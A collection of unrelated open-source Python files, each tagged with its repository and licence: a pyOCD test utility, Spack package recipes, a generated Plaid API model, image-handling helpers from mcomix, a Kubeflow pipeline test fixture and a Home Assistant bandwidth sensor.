import threading
from pyocd.utility.compatibility import to_str_safe
isPy2 = (sys.version_info[0] == 2)
OBJCOPY = "arm-none-eabi-objcopy"
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
PYOCD_DIR = os.path.dirname(TEST_DIR)
TEST_DATA_DIR = os.path.join(TEST_DIR, "data")
def get_test_binary_path(binary_name):
return os.path.join(TEST_DATA_DIR, "binaries", binary_name)
def get_env_name():
return os.environ.get('TOX_ENV_NAME', '')
def get_env_file_name():
env_name = get_env_name()
return ("_" + env_name) if env_name else ''
# Returns common option values passed in when creating test sessions.
def get_session_options():
return {
# These options can be overridden by probe config in pyocd.yaml.
'option_defaults': {
'frequency': 1000000, # 1 MHz
'skip_test': False,
},
}
# Returns a dict containing some test parameters for the target in the passed-in session.
#
# 'test_clock' : the max supported SWD frequency for the target
# 'error_on_invalid_access' : whether invalid accesses cause a fault
#
def get_target_test_params(session):
target_type = session.board.target_type
error_on_invalid_access = True
if target_type in ("nrf51", "nrf52", "nrf52840"):
# Override clock since 10MHz is too fast
test_clock = 1000000
error_on_invalid_access = False
elif target_type == "ncs36510":
# Override clock since 10MHz is too fast
test_clock = 1000000
else:
# Default of 10 MHz. Most probes will not actually run this fast, but this
# sets them to their max supported frequency.
test_clock = 10000000
return {
'test_clock': test_clock,
'error_on_invalid_access': error_on_invalid_access,
}
# Generate an Intel hex file from the binary test file.
def binary_to_hex_file(binary_file, base_address):
temp_test_hex_name = tempfile.mktemp('.hex')
objcopyOutput = subprocess.check_output([OBJCOPY,
"-v", "-I", "binary", "-O", "ihex", "-B", "arm", "-S",
"--set-start", "0x%x" % base_address,
"--change-addresses", "0x%x" % base_address,
binary_file, temp_test_hex_name], stderr=subprocess.STDOUT)
print(to_str_safe(objcopyOutput))
# Need to escape backslashes on Windows.
if sys.platform.startswith('win'):
temp_test_hex_name = temp_test_hex_name.replace('\\', '\\\\')
return temp_test_hex_name
# Generate an elf from the binary test file.
def binary_to_elf_file(binary_file, base_address):
temp_test_elf_name = tempfile.mktemp('.elf')
objcopyOutput = subprocess.check_output([OBJCOPY,
"-v", "-I", "binary", "-O", "elf32-littlearm", "-B", "arm", "-S",
"--set-start", "0x%x" % base_address,
"--change-addresses", "0x%x" % base_address,
binary_file, temp_test_elf_name], stderr=subprocess.STDOUT)
print(to_str_safe(objcopyOutput))
# Need to escape backslashes on Windows.
if sys.platform.startswith('win'):
temp_test_elf_name = temp_test_elf_name.replace('\\', '\\\\')
return temp_test_elf_name
def run_in_parallel(function, args_list):
"""Create and run a thread in parallel for each element in args_list
Wait until all threads finish executing. Throw an exception if an exception
occurred on any of the threads.
"""
def _thread_helper(idx, func, args):
"""Run the function and set result to True if there was not error"""
func(*args)
result_list[idx] = True
result_list = [False] * len(args_list)
thread_list = []
for idx, args in enumerate(args_list):
thread = threading.Thread(target=_thread_helper,
args=(idx, function, args))
thread.start()
thread_list.append(thread)
for thread in thread_list:
thread.join()
for result in result_list:
if result is not True:
raise Exception("Running in thread failed")
class IOTee(object):
def __init__(self, *args):
self.outputs = list(args)
def add(self, output):
self.outputs.append(output)
def write(self, message):
if isPy2 and isinstance(message, str):
message = message.decode('UTF-8')
for out in self.outputs:
out.write(message)
def flush(self):
for out in self.outputs:
out.flush()
class RecordingLogHandler(logging.Handler):
def __init__(self, iostream, level=logging.NOTSET):
super(RecordingLogHandler, self).__init__(level)
self.stream = iostream
def emit(self, record):
try:
message = self.format(record)
if isPy2 and isinstance(message, unicode):
message = message.encode('UTF-8')
self.stream.write(six.u(message + "\n"))
except:
self.handleError(record)
class TestResult(object):
def __init__(self, test_board, test, result):
self.passed = result
self._board = test_board.target_type if test_board else 'unknown'
self.board_name = test_board.name if test_board else ""
self.test = test
self.name = "test"
self.time = 0
self.output = ""
@property
def board(self):
return self._board
@board.setter
def board(self, newBoard):
self._board = newBoard.target_type if newBoard else 'unknown'
self.board_name = newBoard.name
def get_test_case(self):
if 'TOX_ENV_NAME' in os.environ:
classname = "{}.{}.{}.{}".format(os.environ['TOX_ENV_NAME'], self.board_name, self.board, self.name)
else:
classname = "{}.{}.{}".format(self.board_name, self.board, self.name)
case = ElementTree.Element('testcase',
name=self.name,
classname=classname,
status=("passed" if self.passed else "failed"),
time="%.3f" % self.time
)
case.text = "\n"
case.tail = "\n"
if not self.passed:
failed = ElementTree.SubElement(case, 'failure',
message="failure",
type="failure"
)
system_out = ElementTree.SubElement(case, 'system-out')
system_out.text = self.output
return case
class Test(object):
def __init__(self, name, function):
self.name = name
self.test_function = function
def run(self, board):
"""
Run test and return the result
Override this function to return a custom result
"""
passed = False
try:
self.test_function(board.unique_id)
passed = True
except Exception as e:
print("Exception %s when testing board %s" % (e, board.unique_id))
traceback.print_exc(file=sys.stdout)
result = TestResult(board, self, passed)
result.name = self.name
return result
def print_perf_info(self, result_list, output_file=None):
"""
Print performance info if any
"""
pass
@staticmethod
def print_results(result_list, output_file=None):
msg_format_str = "{:<15}{:<21}{:<15}{:<15}"
print("\n\n------ TEST RESULTS ------")
print(msg_format_str .format("Target", "Test", "Result", "Time"),
file=output_file)
print("", file=output_file)
for result in result_list:
status_str = "Pass" if result.passed else "Fail"
print(msg_format_str.format(result.board,
result.test.name,
status_str, "%.3f" % result.time),
file=output_file)
@staticmethod
def all_tests_pass(result_list):
passed = True
for result in result_list:
if not result.passed:
passed = False
break
if len(result_list) <= 0:
passed = False
return passed
| mbedmicro/pyOCD | test/test_util.py | Python | apache-2.0 | 8,912 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Hsakmt(AutotoolsPackage):
"""hsakmt is a thunk library that provides a userspace interface to amdkfd
(AMD's HSA Linux kernel driver). It is the HSA equivalent of libdrm."""
homepage = "https://cgit.freedesktop.org/amd/hsakmt/"
url = "https://www.x.org/archive/individual/lib/hsakmt-1.0.0.tar.gz"
version('1.0.0', '9beb20104e505300daf541266c4c3c3d')
| skosukhin/spack | var/spack/repos/builtin/packages/hsakmt/package.py | Python | lgpl-2.1 | 1,639 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyNistats(PythonPackage):
"""Modeling and Statistical analysis of fMRI data in Python."""
homepage = "https://github.com/nilearn/nistats"
pypi = "nistats/nistats-0.0.1rc0.tar.gz"
version('0.0.1rc0', sha256='dcc4c4e410f542fd72e02e12b3b6531851bae2680d08ad29658b272587ef2f98')
version('0.0.1b2', sha256='a853149087bafbf1bed12664ed8889a63ff15dde1fb7a9d51e8a094afc8d695d')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
# needs +plotting to avoid ModuleNotFoundError:
# 'nilearn.plotting.js_plotting_utils' when importing nistats.reporting
# Functionality has been incorporated into [email protected]:
depends_on('[email protected]:0.6', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/py-nistats/package.py | Python | lgpl-2.1 | 1,272 |
"""
The Plaid API
The Plaid REST API. Please see https://plaid.com/docs/api for more details. # noqa: E501
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from plaid.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from plaid.model.transactions_rule_field import TransactionsRuleField
from plaid.model.transactions_rule_type import TransactionsRuleType
globals()['TransactionsRuleField'] = TransactionsRuleField
globals()['TransactionsRuleType'] = TransactionsRuleType
class TransactionsRuleDetails(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'field': (TransactionsRuleField,), # noqa: E501
'type': (TransactionsRuleType,), # noqa: E501
'query': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'field': 'field', # noqa: E501
'type': 'type', # noqa: E501
'query': 'query', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, field, type, query, *args, **kwargs): # noqa: E501
"""TransactionsRuleDetails - a model defined in OpenAPI
Args:
field (TransactionsRuleField):
type (TransactionsRuleType):
query (str): For TRANSACTION_ID field, provide transaction_id. For NAME field, provide a string pattern.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.field = field
self.type = type
self.query = query
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
| plaid/plaid-python | plaid/model/transactions_rule_details.py | Python | mit | 7,204 |
# ------------------------------------------------------------------------------
# Config
# ------------------------------------------------------------------------------
import os
class BaseConfig():
basedir = os.path.abspath(os.path.dirname(__file__))
# Should the application be in debug mode?
DEBUG = os.getenv('DEBUG', True)
# Host, port
#SERVER_NAME = '%s:%s' % (os.getenv("HOSTNAME", "0.0.0.0"), os.getenv("PORT", 8080))
# Database
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
class ProductionConfig(BaseConfig):
DEBUG = False
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URI') | wazts/user-manager | config.py | Python | gpl-2.0 | 663 |
"""image_tools.py - Various image manipulations."""
import sys
import os
import operator
import itertools
import bisect
import gtk
import Image
import ImageEnhance
import ImageOps
from mcomix.preferences import prefs
# File formats supported by PyGTK (sorted list of extensions)
_supported_formats = sorted(
[ extension.lower() for extlist in
itertools.imap(operator.itemgetter("extensions"),
gtk.gdk.pixbuf_get_formats())
for extension in extlist])
def fit_in_rectangle(src, width, height, scale_up=False, rotation=0):
"""Scale (and return) a pixbuf so that it fits in a rectangle with
dimensions <width> x <height>. A negative <width> or <height>
means an unbounded dimension - both cannot be negative.
If <rotation> is 90, 180 or 270 we rotate <src> first so that the
rotated pixbuf is fitted in the rectangle.
Unless <scale_up> is True we don't stretch images smaller than the
given rectangle.
If <src> has an alpha channel it gets a checkboard background.
"""
# "Unbounded" really means "bounded to 10000 px" - for simplicity.
# MComix would probably choke on larger images anyway.
if width < 0:
width = 100000
elif height < 0:
height = 100000
width = max(width, 1)
height = max(height, 1)
if rotation in (90, 270):
width, height = height, width
src_width = src.get_width()
src_height = src.get_height()
if not scale_up and src_width <= width and src_height <= height:
if src.get_has_alpha():
if prefs['checkered bg for transparent images']:
src = src.composite_color_simple(src_width, src_height,
gtk.gdk.INTERP_TILES, 255, 8, 0x777777, 0x999999)
else:
src = src.composite_color_simple(src_width, src_height,
gtk.gdk.INTERP_TILES, 255, 1024, 0xFFFFFF, 0xFFFFFF)
else:
if float(src_width) / width > float(src_height) / height:
height = int(max(src_height * width / src_width, 1))
else:
width = int(max(src_width * height / src_height, 1))
if src.get_has_alpha():
if prefs['checkered bg for transparent images']:
src = src.composite_color_simple(width, height,
gtk.gdk.INTERP_TILES, 255, 8, 0x777777, 0x999999)
else:
src = src.composite_color_simple(width, height,
gtk.gdk.INTERP_TILES, 255, 1024, 0xFFFFFF, 0xFFFFFF)
else:
src = src.scale_simple(width, height, gtk.gdk.INTERP_TILES)
if rotation == 90:
src = src.rotate_simple(gtk.gdk.PIXBUF_ROTATE_CLOCKWISE)
elif rotation == 180:
src = src.rotate_simple(gtk.gdk.PIXBUF_ROTATE_UPSIDEDOWN)
elif rotation == 270:
src = src.rotate_simple(gtk.gdk.PIXBUF_ROTATE_COUNTERCLOCKWISE)
return src
def fit_2_in_rectangle(src1, src2, width, height, scale_up=False,
rotation1=0, rotation2=0):
"""Scale two pixbufs so that they fit together (side-by-side) into a
rectangle with dimensions <width> x <height>, with a 2 px gap.
If one pixbuf does not use all of its allotted space, the other one
is given it, so that the pixbufs are not necessarily scaled to the
same percentage.
The pixbufs are rotated according to the angles in <rotation1> and
<rotation2> before they are scaled.
See fit_in_rectangle() for more info on the parameters.
"""
# "Unbounded" really means "bounded to 10000 px" - for simplicity.
# MComix would probably choke on larger images anyway.
if width < 0:
width = 10000
elif height < 0:
height = 10000
width -= 2 # We got a 2 px gap between images
width = max(width, 2) # We need at least 1 px per image
height = max(height, 1)
src1_width = src1.get_width()
src1_height = src1.get_height()
src2_width = src2.get_width()
src2_height = src2.get_height()
if rotation1 in (90, 270):
src1_width, src1_height = src1_height, src1_width
if rotation2 in (90, 270):
src2_width, src2_height = src2_height, src2_width
total_width = src1_width + src2_width
alloc_width_src1 = max(src1_width * width / total_width, 1)
alloc_width_src2 = max(src2_width * width / total_width, 1)
needed_width_src1 = round(src1_width *
min(height / float(src1_height), alloc_width_src1 / float(src1_width)))
needed_width_src2 = round(src2_width *
min(height / float(src2_height), alloc_width_src2 / float(src2_width)))
if needed_width_src1 < alloc_width_src1:
alloc_width_src2 += alloc_width_src1 - needed_width_src1
elif needed_width_src1 >= alloc_width_src1:
alloc_width_src1 += alloc_width_src2 - needed_width_src2
return (fit_in_rectangle(src1, int(alloc_width_src1), height,
scale_up, rotation1),
fit_in_rectangle(src2, int(alloc_width_src2), height,
scale_up, rotation2))
def add_border(pixbuf, thickness, colour=0x000000FF):
"""Return a pixbuf from <pixbuf> with a <thickness> px border of
<colour> added.
"""
canvas = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8,
pixbuf.get_width() + thickness * 2,
pixbuf.get_height() + thickness * 2)
canvas.fill(colour)
pixbuf.copy_area(0, 0, pixbuf.get_width(), pixbuf.get_height(),
canvas, thickness, thickness)
return canvas
def get_most_common_edge_colour(pixbufs, edge=2):
"""Return the most commonly occurring pixel value along the four edges
of <pixbuf>. The return value is a sequence, (r, g, b), with 16 bit
values. If <pixbuf> is a tuple, the edges will be computed from
both the left and the right image.
Note: This could be done more cleanly with subpixbuf(), but that
doesn't work as expected together with get_pixels().
"""
def group_colors(colors, steps=10):
""" This rounds a list of colors in C{colors} to the next nearest value,
i.e. 128, 83, 10 becomes 130, 85, 10 with C{steps}=5. This compensates for
dirty colors where no clear dominating color can be made out.
@return: The color that appears most often in the prominent group."""
# Start group
group = (0, 0, 0)
# List of (count, color) pairs, group contains most colors
colors_in_prominent_group = []
color_count_in_prominent_group = 0
# List of (count, color) pairs, current color group
colors_in_group = []
color_count_in_group = 0
for count, color in colors:
# Round color
rounded = [0] * len(color)
for i, color_value in enumerate(color):
if steps % 2 == 0:
middle = steps // 2
else:
middle = steps // 2 + 1
remainder = color_value % steps
if remainder >= middle:
color_value = color_value + (steps - remainder)
else:
color_value = color_value - remainder
rounded[i] = min(255, max(0, color_value))
# Change prominent group if necessary
if rounded == group:
# Color still fits in the previous color group
colors_in_group.append((count, color))
color_count_in_group += count
else:
# Color group changed, check if current group has more colors
# than last group
if color_count_in_group > color_count_in_prominent_group:
colors_in_prominent_group = colors_in_group
color_count_in_prominent_group = color_count_in_group
group = rounded
colors_in_group = [ (count, color) ]
color_count_in_group = count
# Cleanup if only one edge color group was found
if color_count_in_group > color_count_in_prominent_group:
colors_in_prominent_group = colors_in_group
colors_in_prominent_group.sort(key=operator.itemgetter(0), reverse=True)
# List is now sorted by color count, first color appears most often
return colors_in_prominent_group[0][1]
def get_edge_pixbuf(pixbuf, side, edge):
""" Returns a pixbuf corresponding to the side passed in <side>.
Valid sides are 'left', 'right', 'top', 'bottom'. """
width = pixbuf.get_width()
height = pixbuf.get_height()
edge = min(edge, width, height)
subpix = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,
pixbuf.get_has_alpha(), 8, edge, height)
if side == 'left':
pixbuf.copy_area(0, 0, edge, height, subpix, 0, 0)
elif side == 'right':
pixbuf.copy_area(width - edge, 0, edge, height, subpix, 0, 0)
elif side == 'top':
pixbuf.copy_area(0, 0, width, edge, subpix, 0, 0)
elif side == 'bottom':
pixbuf.copy_area(0, height - edge, width, edge, subpix, 0, 0)
else:
assert False, 'Invalid edge side'
return subpix
if not pixbufs:
return (0, 0, 0)
if not isinstance(pixbufs, (tuple, list)):
left_edge = get_edge_pixbuf(pixbufs, 'left', edge)
right_edge = get_edge_pixbuf(pixbufs, 'right', edge)
else:
assert len(pixbufs) == 2, 'Expected two pages in list'
left_edge = get_edge_pixbuf(pixbufs[0], 'left', edge)
right_edge = get_edge_pixbuf(pixbufs[1], 'right', edge)
# Find all edge colors. Color count is separate for all four edges
ungrouped_colors = []
for edge in (left_edge, right_edge):
im = pixbuf_to_pil(edge)
ungrouped_colors.extend(im.getcolors(im.size[0] * im.size[1]))
# Sum up colors from all edges
ungrouped_colors.sort(key=operator.itemgetter(1))
most_used = group_colors(ungrouped_colors)
return [color * 257 for color in most_used]
def pil_to_pixbuf(image):
"""Return a pixbuf created from the PIL <image>."""
if image.mode.startswith('RGB'):
imagestr = image.tostring()
IS_RGBA = image.mode == 'RGBA'
return gtk.gdk.pixbuf_new_from_data(imagestr, gtk.gdk.COLORSPACE_RGB,
IS_RGBA, 8, image.size[0], image.size[1],
(IS_RGBA and 4 or 3) * image.size[0])
else:
imagestr = image.convert('RGB').tostring()
return gtk.gdk.pixbuf_new_from_data(imagestr, gtk.gdk.COLORSPACE_RGB,
False, 8, image.size[0], image.size[1],
3 * image.size[0])
def pixbuf_to_pil(pixbuf):
"""Return a PIL image created from <pixbuf>."""
dimensions = pixbuf.get_width(), pixbuf.get_height()
stride = pixbuf.get_rowstride()
pixels = pixbuf.get_pixels()
mode = pixbuf.get_has_alpha() and 'RGBA' or 'RGB'
return Image.frombuffer(mode, dimensions, pixels, 'raw', mode, stride, 1)
def load_pixbuf(path):
""" Loads a pixbuf from a given image file. Works around GTK's
slowness on Win32 by using PIL for loading instead and
converting it afterwards. """
if sys.platform == 'win32' and gtk.gtk_version > (2, 18, 2):
pil_img = Image.open(path)
return pil_to_pixbuf(pil_img)
else:
return gtk.gdk.pixbuf_new_from_file(path)
def load_pixbuf_size(path, width, height):
""" Loads a pixbuf from a given image file and scale it to fit
inside (width, height). """
try:
return fit_in_rectangle(load_pixbuf(path), width, height)
except:
return None
def load_pixbuf_data(imgdata):
""" Loads a pixbuf from the data passed in <imgdata>. """
loader = gtk.gdk.PixbufLoader()
loader.write(imgdata, len(imgdata))
loader.close()
return loader.get_pixbuf()
def enhance(pixbuf, brightness=1.0, contrast=1.0, saturation=1.0,
sharpness=1.0, autocontrast=False):
"""Return a modified pixbuf from <pixbuf> where the enhancement operations
corresponding to each argument has been performed. A value of 1.0 means
no change. If <autocontrast> is True it overrides the <contrast> value,
but only if the image mode is supported by ImageOps.autocontrast (i.e.
it is L or RGB.)
"""
im = pixbuf_to_pil(pixbuf)
if brightness != 1.0:
im = ImageEnhance.Brightness(im).enhance(brightness)
if autocontrast and im.mode in ('L', 'RGB'):
im = ImageOps.autocontrast(im, cutoff=0.1)
elif contrast != 1.0:
im = ImageEnhance.Contrast(im).enhance(contrast)
if saturation != 1.0:
im = ImageEnhance.Color(im).enhance(saturation)
if sharpness != 1.0:
im = ImageEnhance.Sharpness(im).enhance(sharpness)
return pil_to_pixbuf(im)
def get_implied_rotation(pixbuf):
"""Return the implied rotation of the pixbuf, as given by the pixbuf's
orientation option (the value of which is based on EXIF data etc.).
The implied rotation is the angle (in degrees) that the raw pixbuf should
be rotated in order to be displayed "correctly". E.g. a photograph taken
by a camera that is held sideways might store this fact in its EXIF data,
and the pixbuf loader will set the orientation option correspondingly.
"""
orientation = pixbuf.get_option('orientation')
if orientation == '3':
return 180
elif orientation == '6':
return 90
elif orientation == '8':
return 270
return 0
def combine_pixbufs( pixbuf1, pixbuf2, are_in_manga_mode ):
if are_in_manga_mode:
r_source_pixbuf = pixbuf1
l_source_pixbuf = pixbuf2
else:
l_source_pixbuf = pixbuf1
r_source_pixbuf = pixbuf2
has_alpha = False
if l_source_pixbuf.get_property( 'has-alpha' ) or \
r_source_pixbuf.get_property( 'has-alpha' ):
has_alpha = True
bits_per_sample = 8
l_source_pixbuf_width = l_source_pixbuf.get_property( 'width' )
r_source_pixbuf_width = r_source_pixbuf.get_property( 'width' )
l_source_pixbuf_height = l_source_pixbuf.get_property( 'height' )
r_source_pixbuf_height = r_source_pixbuf.get_property( 'height' )
new_width = l_source_pixbuf_width + r_source_pixbuf_width
new_height = max( l_source_pixbuf_height, r_source_pixbuf_height )
new_pix_buf = gtk.gdk.Pixbuf( gtk.gdk.COLORSPACE_RGB, has_alpha,
bits_per_sample, new_width, new_height )
l_source_pixbuf.copy_area( 0, 0, l_source_pixbuf_width,
l_source_pixbuf_height,
new_pix_buf, 0, 0 )
r_source_pixbuf.copy_area( 0, 0, r_source_pixbuf_width,
r_source_pixbuf_height,
new_pix_buf, l_source_pixbuf_width, 0 )
return new_pix_buf
def is_image_file(path):
"""Return True if the file at <path> is an image file recognized by PyGTK.
"""
if os.path.isfile(path):
ext = os.path.splitext(path)[1][1:].lower()
ext_index = bisect.bisect_left(_supported_formats, ext)
return ext_index != len(_supported_formats) and _supported_formats[ext_index] == ext
else:
return False
# vim: expandtab:sw=4:ts=4
| HoverHell/mcomix-0 | mcomix/image_tools.py | Python | gpl-2.0 | 15,226 |
# Copyright 2020 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pathlib
from kfp import components
from kfp import dsl
from kfp import compiler
component_op_1 = components.load_component_from_text("""
name: Write to GCS
inputs:
- {name: text, type: String, description: 'Content to be written to GCS'}
outputs:
- {name: output_gcs_path, type: GCSPath, description: 'GCS file path'}
implementation:
container:
image: google/cloud-sdk:slim
command:
- sh
- -c
- |
set -e -x
echo "$0" | gsutil cp - "$1"
- {inputValue: text}
- {outputUri: output_gcs_path}
""")
component_op_2 = components.load_component_from_text("""
name: Read from GCS
inputs:
- {name: input_gcs_path, type: GCSPath, description: 'GCS file path'}
implementation:
container:
image: google/cloud-sdk:slim
command:
- sh
- -c
- |
set -e -x
gsutil cat "$0"
- {inputUri: input_gcs_path}
""")
@dsl.pipeline(name='simple-two-step-pipeline', pipeline_root='dummy_root')
def my_pipeline(text: str = 'Hello world!'):
component_1 = component_op_1(text=text).set_display_name('Producer')
component_2 = component_op_2(
input_gcs_path=component_1.outputs['output_gcs_path'])
component_2.set_display_name('Consumer')
if __name__ == '__main__':
compiler.Compiler().compile(
pipeline_func=my_pipeline,
pipeline_parameters={'text': 'Hello KFP!'},
package_path=__file__.replace('.py', '.json'))
| kubeflow/pipelines | sdk/python/kfp/compiler_cli_tests/test_data/two_step_pipeline.py | Python | apache-2.0 | 2,004 |
"""Support for Start.ca Bandwidth Monitor."""
from datetime import timedelta
from xml.parsers.expat import ExpatError
import logging
import async_timeout
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_API_KEY, CONF_MONITORED_VARIABLES, CONF_NAME)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'Start.ca'
CONF_TOTAL_BANDWIDTH = 'total_bandwidth'
GIGABYTES = 'GB' # type: str
PERCENT = '%' # type: str
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=1)
REQUEST_TIMEOUT = 5 # seconds
SENSOR_TYPES = {
'usage': ['Usage Ratio', PERCENT, 'mdi:percent'],
'usage_gb': ['Usage', GIGABYTES, 'mdi:download'],
'limit': ['Data limit', GIGABYTES, 'mdi:download'],
'used_download': ['Used Download', GIGABYTES, 'mdi:download'],
'used_upload': ['Used Upload', GIGABYTES, 'mdi:upload'],
'used_total': ['Used Total', GIGABYTES, 'mdi:download'],
'grace_download': ['Grace Download', GIGABYTES, 'mdi:download'],
'grace_upload': ['Grace Upload', GIGABYTES, 'mdi:upload'],
'grace_total': ['Grace Total', GIGABYTES, 'mdi:download'],
'total_download': ['Total Download', GIGABYTES, 'mdi:download'],
'total_upload': ['Total Upload', GIGABYTES, 'mdi:download'],
'used_remaining': ['Remaining', GIGABYTES, 'mdi:download']
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_MONITORED_VARIABLES):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_TOTAL_BANDWIDTH): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the sensor platform."""
websession = async_get_clientsession(hass)
apikey = config.get(CONF_API_KEY)
bandwidthcap = config.get(CONF_TOTAL_BANDWIDTH)
ts_data = StartcaData(hass.loop, websession, apikey, bandwidthcap)
ret = await ts_data.async_update()
if ret is False:
_LOGGER.error("Invalid Start.ca API key: %s", apikey)
return
name = config.get(CONF_NAME)
sensors = []
for variable in config[CONF_MONITORED_VARIABLES]:
sensors.append(StartcaSensor(ts_data, variable, name))
async_add_entities(sensors, True)
class StartcaSensor(Entity):
"""Representation of Start.ca Bandwidth sensor."""
def __init__(self, startcadata, sensor_type, name):
"""Initialize the sensor."""
self.client_name = name
self.type = sensor_type
self._name = SENSOR_TYPES[sensor_type][0]
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
self._icon = SENSOR_TYPES[sensor_type][2]
self.startcadata = startcadata
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self.client_name, self._name)
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self._icon
async def async_update(self):
"""Get the latest data from Start.ca and update the state."""
await self.startcadata.async_update()
if self.type in self.startcadata.data:
self._state = round(self.startcadata.data[self.type], 2)
class StartcaData:
"""Get data from Start.ca API."""
def __init__(self, loop, websession, api_key, bandwidth_cap):
"""Initialize the data object."""
self.loop = loop
self.websession = websession
self.api_key = api_key
